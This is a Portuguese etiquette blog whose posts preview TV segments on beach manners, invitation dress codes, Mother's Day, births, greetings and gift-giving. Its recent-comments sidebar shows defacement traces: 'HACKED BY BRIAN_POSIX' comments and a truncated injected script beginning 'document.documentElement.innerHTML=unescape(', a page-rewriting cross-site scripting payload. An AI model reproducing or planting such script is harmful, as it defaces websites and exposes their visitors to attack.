Saber Estar e Ser @ 19:08

Seg, 18/07/11

Sempre que há um fim-de-semana prolongado ou mesmo quando começam as férias de Verão, a debandada para a praia é geral. Disso, não tenhamos a menor dúvida!

 

Será que pelo facto de ser um ambiente informal e muito descontraído, o saber ser e fazer também ocupa lugar na praia? – Sem dúvida que SIM!

Dependendo da praia, a disputa por um palmo de areia pode tornar-se mais ou menos acirrada, o que pode fazer aumentar, exponencialmente, sérios problemas de convivência com os nossos vizinhos de guarda-sol.

 

Ao contrário do que muitos possam pensar, a praia é, efectivamente de todos mas isso também não é motivo para cada um, per si, dizer, egoistamente: “é minha!”. Ir de madrugada e demarcar a sua “assoalhada”, é uma grande falta de respeito. Sobretudo, em dias que se prevê que a praia vai estar cheia.

 


Tags:


Saber Estar e Ser @ 19:08

Seg, 20/06/11

Na realidade, há palavras que ditas em língua estrangeira dão mais ênfase à intenção do dizer. Contudo, usar estrangeirismos, num convite todo escrito em português, quando temos uma Língua tão rica como o é o nosso Português é menosprezar a riqueza da Língua mãe! Porquê escrever “dress code”, quando, simplesmente, se pode escrever “traje”? Porque escrever “black tie” quando, afinal, estamos a pedir, “traje de gala”? E se acaso confunde “informal” com “desportivo”… cuidado! Não é bem a mesma coisa e poderá fazer uma má figura!

 

Hoje vamos desmistificar todo esse código dos trajes que os convites pedem para as mais variadas e diversas ocasiões. No fundo, no fundo, todos temos dúvidas mas o preconceito da “ignorância” trava a nossa franqueza. Não se acanhe e pergunte! Pergunte que no Saber Estar e Ser iremos, com todo o gosto, na direcção da resposta pretendida.”

 


Tags:


Saber Estar e Ser @ 19:12

Seg, 23/05/11

Se a ou o questionassem sobre a sua idade ou porque se “deixou” engordar tanto, qual destas questões a ou o deixaria mais incomodada/o?

 

E porque, afinal, quer obter essas respostas? – Por inveja? Por carinho? Para comparação? Por interesse? Ou apenas curiosidade?

 

Quantas vezes, alguém, pelo menos uma vez na vida, já não nos confrontou com uma – ou todas - estas questões?

 

E sabe qual delas é a menos protocolar? – Essa?!...

 

Não sei se acertou mas assista ao programa de hoje e logo saberá, afinal, qual é a menos cortês, a que espelha mais falta de etiqueta. Na oportunidade, cuidado com o que pretende dizer com “elegante”…

 

Naturalmente, agradecemos as suas dúvidas/sugestões.

 


Tags:


Saber Estar e Ser @ 18:52

Seg, 25/04/11

“Mãe há só uma” é a frase que mais se ouve com especial incidência no advento do Dia da Mãe.

 

Mas será mesmo só uma? Mãe é aquela que ama incondicionalmente, seja ela quem educa ou cria, independentemente de ser a mãe biológica. Assim sendo, qual é a que deve ser mais acarinhada? – Mãe biológica ou mãe-bónus?

 

A origem do Dia da Mãe não é assim tão longínqua e, ironicamente, nasceu pela perda de uma mãe! Qual, então, a melhor homenagem a esse grande Ser? Prendas físicas e/ou com sentimento? Será que o orçamento pode refrear a homenagem à Mãe? Concorde ou discorde, não deixe de submeter a sua opinião ou sugestão neste “Mais Mulher” dedicado à Mãe.

 


Tags:


Saber Estar e Ser @ 17:38

Seg, 28/03/11

A chegada da Primavera é o mote para iniciar nova rotina, novos hábitos e, como não podia deixar de ser, é a época de grande azáfama na busca de tudo o que é detalhe para um Casamento, seja para os próprios noivos seja para os convidados.

Quando se fala em Casamento, relacionamo-lo logo com quê?

Esteja atenta/o porque este é um tema com “porquês” muito engraçados.


Tags:


Saber Estar e Ser @ 19:03

Seg, 07/03/11

Como é um começo de ano, começo de vida… falou-se muito nos primeiros nascimentos, lembrei-me de falar em “Nascimentos”.

Como anunciar e por quem?

O que ofertar?

O que dizer e escrever,

Quanto tempo deve demorar uma visita, se ir a casa ou ao local de nascimento.




Saber Estar e Ser @ 17:36

Seg, 03/01/11

Em sintonia com o começo de um novo ano, nesta rubrica falamos de começo de vida…ou seja, de Nascimentos. Quando se dá um novo nascimento é preciso saber como anunciar e por quem, o que ofertar, o que dizer e escrever, quanto tempo deve demorar uma visita, devemos ir a casa ou ao local de nascimento, entre outras. Na rubrica desta terça-feira fique a saber a resposta a estas, e muitas outras questões.



Saber Estar e Ser @ 19:02

Seg, 06/12/10

Hoje, mais do que nunca, “Saber Ser e Estar” são demarcados por pequenos gestos que devem ser o mais natural e genuínos possíveis. As apresentações e cumprimentos, quando oportunamente bem-feitos podem fazer toda a diferença num qualquer ambiente social, numa reunião, numa entrevista… Quem nunca foi “apanhado” num entrave de saber quem é que apresenta a quem; se dá um ou dois beijos… Acompanhe-nos em mais este “Mais Mulher”, coloque as suas dúvidas e sugestões no nosso blog, pois teremos todo o gosto em ser úteis, respondendo.


Tags:


Saber Estar e Ser @ 19:03

Seg, 08/11/10

Ser presenteado e saber presentear é um acto comum, natural e agradável tanto para quem dá como para quem recebe. No entanto, há pormenores nesses gestos que podem fazer toda a diferença. Flores em número ímpar: porquê? E que mensagem aporta cada cor? Dar o quê? Será que dar dinheiro não reflectirá desorganização e impessoalidade?

Já agora, esclareçamos: diz-se brinde, presente, prenda ou oferta? Saiba tudo na rubrica “Saber Ser e Estar” e coloque todas as suas dúvidas no nosso blogue.

Teremos todo o gosto em esclarecê-las.


Tags:


Saber Estar e Ser @ 19:43

Seg, 11/10/10

“Marketing de Imagem” pode parecer algo presunçoso mas assim como somos levados a comprar um perfume seduzidos (em 80% das vezes) pela beleza e charme da embalagem, o saber apresentar-se é uma arte que se vai trabalhando ao longo do tempo como se fosse um diamante em constante lapidação com a finalidade de ficar cada vez mais atraente e apetecível. Então como conseguir esse aperfeiçoamento?



Facebook Like

Pub
Rubricas
Comentários recentes
Kd o vídeo?
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa...
HACKED BY BRIAN_POSIXHACKED BY BRIAN_POSIXHACKED B...
Hacked By Brian_posix !!SIC MULHER PWNED BY BPOSIX...
document.documentElement.innerHTML=unescape("Hacke...
Amei <3 mt
https://m.facebook.com/Veredictod1amor/insights/
Acabei de o receber, muito obrigada!
Pesquisar
 
subscrever feeds
blogs SAPO